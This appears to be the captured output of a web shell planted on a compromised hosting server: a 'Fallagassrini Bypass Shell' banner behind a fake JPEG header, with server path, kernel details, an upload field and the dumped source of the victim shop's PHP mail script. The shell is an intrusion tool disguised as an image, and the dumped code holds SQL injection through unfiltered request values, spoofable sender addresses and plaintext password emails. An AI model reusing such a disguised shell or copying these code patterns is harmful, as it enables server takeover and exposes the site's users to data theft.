JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/mail/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/mail/mail_function_1.php

<?php
session_start();
include("sql.php");
#####################################
# Include PHP Mailer Class
#####################################
require("class.phpmailer.php");
?>
<?php
#####################################
# Function to send email
#####################################
function sendEmail ($fromName, $fromEmail, $toEmail, $subject, $emailBody) {
	$mail = new PHPMailer();
	$mail->FromName = $fromName;
	$mail->From = $fromEmail;
	$mail->AddAddress("$toEmail");
		
	$mail->Subject = $subject;
	$mail->Body = $emailBody;
	$mail->isHTML(true);
	$mail->WordWrap = 150;
		
	if(!$mail->Send()) {
		return false;
	} else {
		return true;
	}
}

#####################################
# Function to Read a file 
# and store all data into a variable
#####################################
function readTemplateFile($FileName) {
		$fp = fopen($FileName,"r") or exit("Unable to open File ".$FileName);
		$str = "";
		while(!feof($fp)) {
			$str .= fread($fp,1024);
		}	
		return $str;
}
?>
<?php
#####################################
# Finally send email
#####################################
	
	if(isset($_REQUEST['email']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	   $name= $_REQUEST['name'];
	   $email= $_REQUEST['email'];
	   $from_email=$_REQUEST['f_id'];
	  
	    if($_REQUEST['S']==0)
	    {
			 $status="Processing";
		}
		elseif($_REQUEST['S']==1)
		{
			$status="Success";
		}
		elseif($_REQUEST['S']==2)
		{
			$status="Pending";
		}
		else
		{
			$status="Failure";
				
		}
	  	  
	   $order_id= $_REQUEST['O'];
	   $message="Payment for Order ".$order_id." has been made successfully.It's status is ".$status;
	  
	
	    $url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
		 
		$_SESSION['sent']='Email successfully sent!';
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("query.html");
				
		//Replace all the variables in template file
		$emailBody = str_replace("#name#",$name,$emailBody);
		$emailBody = str_replace("#email#",$email,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
		$emailBody = str_replace("#url#",$url,$emailBody);

	//Send email
	    $emailStatus = sendEmail ("Shoptayo",$from_email,$email,"Email from Shoptayo", $emailBody);
		 if($emailStatus==true)
         {
            $status='1';
         }
         else
         {
            $status='0';
         } 
	  		echo "<script type='text/javascript'>window.location='../admin/orders/o_status/".$order_id."/".$status."'</script>";
	}
	
	
	if(isset($_REQUEST['email_w']))
	{
	//Data to be sent (Ideally fetched from Database)
	
		 $name_w= $_REQUEST['name_w'];
		 $email_w= $_REQUEST['email_w'];
		 $product_id= $_REQUEST['P'];
		 $from_email=$_REQUEST['f_id'];	
	
		 $message="You win the bid over the item ".$product_id;	
			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
		 
		 $_SESSION['sent']='Email successfully sent!';
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template.html");
				
		//Replace all the variables in template file
		$emailBody = str_replace("#name#",$name_w,$emailBody);
		$emailBody = str_replace("#email#",$email_w,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
		$emailBody = str_replace("#url#",$url,$emailBody);

	//Send email
	 	 $emailStatus = sendEmail ("Shoptayo",$from_email,$email_w,"Email from Shoptayo", $emailBody);
         if($emailStatus==true)
         {
            $status='1';
         }
         else
         {
           	$status='0';
         } 
	
	  	echo "<script type='text/javascript'>window.location='../admin/bids/bid_notify/".$product_id."/".$status."'</script>";
	}


    if(isset($_REQUEST['dep']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	 	  $department= $_REQUEST['dep'];
	 	  $topic= $_REQUEST['tpc'];
	  	  $subtopic= $_REQUEST['stpc'];
          $severity= $_REQUEST['sev'];
          $csubject= $_REQUEST['sub'];
          $cmessage= $_REQUEST['msg'];
          $email1= $_REQUEST['email1'];
	 			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
			 
		$_SESSION['confirm_id']='Email successfully sent!';
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template1.html");
			
	//Replace all the variables in template file
		$emailBody = str_replace("#department#",$department,$emailBody);
		$emailBody = str_replace("#topic#",$topic,$emailBody);
		$emailBody = str_replace("#subtopic#",$subtopic,$emailBody);
        $emailBody = str_replace("#severity#",$severity,$emailBody);
        $emailBody = str_replace("#csubject#",$csubject,$emailBody);
        $emailBody = str_replace("#cmessage#",$cmessage,$emailBody); 
         
		$emailBody = str_replace("#url#",$url,$emailBody);


        $emailBody1 = readTemplateFile("template2.html");
			
	//Replace all the variables in template file
        $usermessage="Thanks for contacting us.We will revert back to you soon.";

		$emailBody1 = str_replace("#email#",$email1,$emailBody1); 
        $emailBody1 = str_replace("#usermessage#",$usermessage,$emailBody1); 
         
		$emailBody1 = str_replace("#url#",$url,$emailBody1);

	//Send email
		 $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$email1,"Email from Shoptayo", $emailBody1);
         $emailStatus1 = sendEmail ("Shoptayo",$email1,"contact@shoptayo.com","Email from Shoptayo", $emailBody);
	
	  echo "<script type='text/javascript'>window.location='../contact_success'</script>";
	}



    if(isset($_REQUEST['b_email']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	  $name= $_REQUEST['b_name'];
	  $email_b= $_REQUEST['b_email'];
	  
	  $base_email=$email_b;
	  
	        $url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {

 $main=$url1."home/confirm/".$base_email;

		
		}
		else
		{
                $main="http://".$url1."home/confirm/".$base_email;
		$url1="http://".$url1;
		}

$val= $main;
        $message="Thank you for registering with us. ";	 
		
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template3.html");
				
		//Replace all the variables in template file
		$emailBody = str_replace("#name#",$name,$emailBody);
		$emailBody = str_replace("#email#",$email_b,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
$emailBody = str_replace("#reg#",$val,$emailBody);
		$emailBody = str_replace("#url#",$url1,$emailBody);

	//Send email
	    $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$email_b,"Email from Shoptayo", $emailBody);
	if($_REQUEST['str']!=1){
	  echo "<script type='text/javascript'>window.location='../buyer_registration'</script>";
}else{
$_SESSION['confirm_id']='Resend confirmation link successfully';
echo "<script type='text/javascript'>window.location='".$url1."'</script>";
}
	}


    if(isset($_REQUEST['s_email']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	    $name= $_REQUEST['s_name'];
	    $email_s= $_REQUEST['s_email'];
		
		$base_email=$email_s;
			
	 	$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {

 $main=$url1."home/confirm/".$base_email;

		
		}
		else
		{
                $main="http://".$url1."home/confirm/".$base_email;
			
		}


$val=$main;
        $message="Thanks for registering with us. ";
       
	
	 $url2=$_SERVER['SERVER_NAME']."/";	 
		
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template3.html");
				
		//Replace all the variables in template file
		$emailBody = str_replace("#name#",$name,$emailBody);
		$emailBody = str_replace("#email#",$base_email,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
$emailBody = str_replace("#reg#",$val,$emailBody);
		$emailBody = str_replace("#url#",$url2,$emailBody);

	//Send email
	 	$emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$email_s,"Email from Shoptayo", $emailBody);
	
	  echo "<script type='text/javascript'>window.location='../seller_registration'</script>";
	}


    if(isset($_REQUEST['f_email']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	  		$name= $_REQUEST['f_name'];
	  		$email_f= $_REQUEST['f_email'];
            $password=base64_decode($_REQUEST['f_pass']); 
		  
	       $url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   
		   $main=$url1;

		}
		else
		{			
			$main="http://".$url1;

		}
		
		
		$val1=$main;
       $message="Your password is ".$password;
	


		 
		$_SESSION['confirm_id']='Email is sent successfully!';
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template5.html");
				
		//Replace all the variables in template file
		$emailBody = str_replace("#name#",$name,$emailBody);
		$emailBody = str_replace("#email#",$email,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
$emailBody = str_replace("#reg#",$val1,$emailBody);
		$emailBody = str_replace("#url#",$url,$emailBody);

	//Send email
	   $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$email_f,"Email from Shoptayo", $emailBody);
	
	  echo "<script type='text/javascript'>window.location='../home'</script>";
	}
	
	
	if(isset($_REQUEST['tx_n']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	  		$refno= $_REQUEST['tx_n'];
	  		$uid=$_REQUEST['uid'];
			$type= $_REQUEST['typ'];
			$paystatus= $_REQUEST['st'];
			
			$sel=mysql_query("select * from orders where order_id='$refno'");
            $rowval=mysql_fetch_array($sel);
			
			$sel_user=mysql_query("select * from  users where id='".$uid."'");
			$row_user=mysql_fetch_array($sel_user);
			$sel_email=$row_user['email'];
			$message='';
			if($paystatus==1)
			{
			$message ='Welcome to shoptayo!<br><br>Thanks For shopping from shoptayo.com and product details are given below:-<br><br>';
			}elseif($paystatus==2)
			{
			$message ='Welcome to shoptayo!<br>Sorry your payment transaction is pending and product details are given below:-<br><br>';
			}
			if($paystatus==1 || $paystatus==2)
			{
				$ord1=mysql_query("select * from order_products where order_id='$refno' and user_id='".$uid."'");
				$nums=mysql_num_rows($ord1);
				if($nums>0)
				{
					$message .='<table>
					<tr>
					<td>Product Name</td>
					<td>Product Price</td>
					<td>Product Quantity</td>
					<td>Coupons Discount</td>
					<td>Total Price</td>
					<td>Transaction status</td>
					</tr>';
					while($num_pro1=mysql_fetch_array($ord1))
					{
						$prd_name=$num_pro1['product_name'];
						$quantity=$num_pro1['quantity'];
						$price=$num_pro1['price'];
						$coupon=$num_pro1['coupon'];
						$status1=$num_pro1['status'];
						$total=($quantity*$price)-$coupon;
						if($status1==1)
						{
						$status='Success';
						}else
						{
						$status='Pending';
						}
											
						$message .='<tr>
						<td>'.$prd_name.'</td>
						<td>'.$price.'</td>
						<td>'.$quantity.'</td>
						<td>'.$coupon.'</td>
						<td>'.$total.'</td>
						<td>'.$status.'</td>
						</tr>';	
				 	}	
				 	$message .='</table>';
					
					if($paystatus==1)
			{
			$message .='<br><br>Please login from website and take printout of your product voucher.';
			}
				}
			}
			else
			{
				$message="Your payment for the products of total price P".$rowval['net_payment']." is failed." ;
			}
           
		  
	   	$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
			
		$_SESSION['confirm_id']='Email is sent successfully!';
			//Send email to user containing username and password
			//Read Template File 
			$emailBody = readTemplateFile("template4.html");
					
			//Replace all the variables in template file
			$emailBody = str_replace("#sel_email#",$sel_email,$emailBody);
			$emailBody = str_replace("#message#",$message,$emailBody);
			$emailBody = str_replace("#url#",$url,$emailBody);
		
		//Send email
		   $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$sel_email,"Email from Shoptayo", $emailBody);
		   
	  	echo "<script type='text/javascript'>window.location='../shoptayo_cart/response_mail/".$refno."/".$paystatus."/".$type."'</script>";
	}
	
	
	
	if(isset($_REQUEST['p_n']))
	{
	//Data to be sent (Ideally fetched from Database)
	
$pid= base64_encode($_REQUEST['pid']);	 	  
$p_n= $_REQUEST['p_n'];
	 	  $r_p= $_REQUEST['r_p'];
	  	  $d_p= $_REQUEST['d_p'];
          $s_d= $_REQUEST['s_d'];
          $e_d= $_REQUEST['e_d'];
          $p_code= $_REQUEST['p_code'];
          $emails= $_REQUEST['emails'];
          $name= $_REQUEST['name'];
	 			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
			 $pid=$url.'deal_view/index/'.$pid;
		$_SESSION['confirm_id']='Your deal has been added successfully. It will take 2 weeks in approval from Admin!';

$message='Your deal has been added successfully. It will take 2 weeks in approval from Admin!';
		//Send email to user containing username and password
		//Read Template File 
        
		$emailBody = readTemplateFile("template6.html");
			
	//Replace all the variables in template file
		$emailBody = str_replace("#p_n#",$p_n,$emailBody);
		$emailBody = str_replace("#r_p#",$r_p,$emailBody);
		$emailBody = str_replace("#d_p#",$d_p,$emailBody);
        $emailBody = str_replace("#s_d#",$s_d,$emailBody);
        $emailBody = str_replace("#e_d#",$e_d,$emailBody);
        $emailBody = str_replace("#p_code#",$p_code,$emailBody);
        $emailBody = str_replace("#name#",$name,$emailBody); 


$emailBody = str_replace("#msg#",$message,$emailBody); 
         
		$emailBody = str_replace("#url#",$url,$emailBody);
$emailBody = str_replace("#view#",$pid,$emailBody); 


        
	//Send email
		 $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$emails,"Email from Shoptayo", $emailBody);
        
	
	  echo "<script type='text/javascript'>window.location='../view_listing'</script>";
	}
	
	
	if(isset($_REQUEST['buy_email']))
	{
	//Data to be sent (Ideally fetched from Database)
          $emails= $_REQUEST['buy_email'];
	 			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
$_SESSION['confirm_id']='Request has been approved successfully.';
$message='Your request has been approved successfully by seller. Please login and check your approved schedule request!';
		//Read Template File 
        
		$emailBody = readTemplateFile("template7.html");
			
	//Replace all the variables in template file
		$emailBody = str_replace("#msg#",$message,$emailBody); 
        $emailBody = str_replace("#url#",$url,$emailBody);
		$emailBody = str_replace("#name#",$emails,$emailBody);
        
	//Send email
		 $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$emails,"Email from Shoptayo", $emailBody);
        
	
	  echo "<script type='text/javascript'>window.location='../seller_schedule_view'</script>";
	}
	
	
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net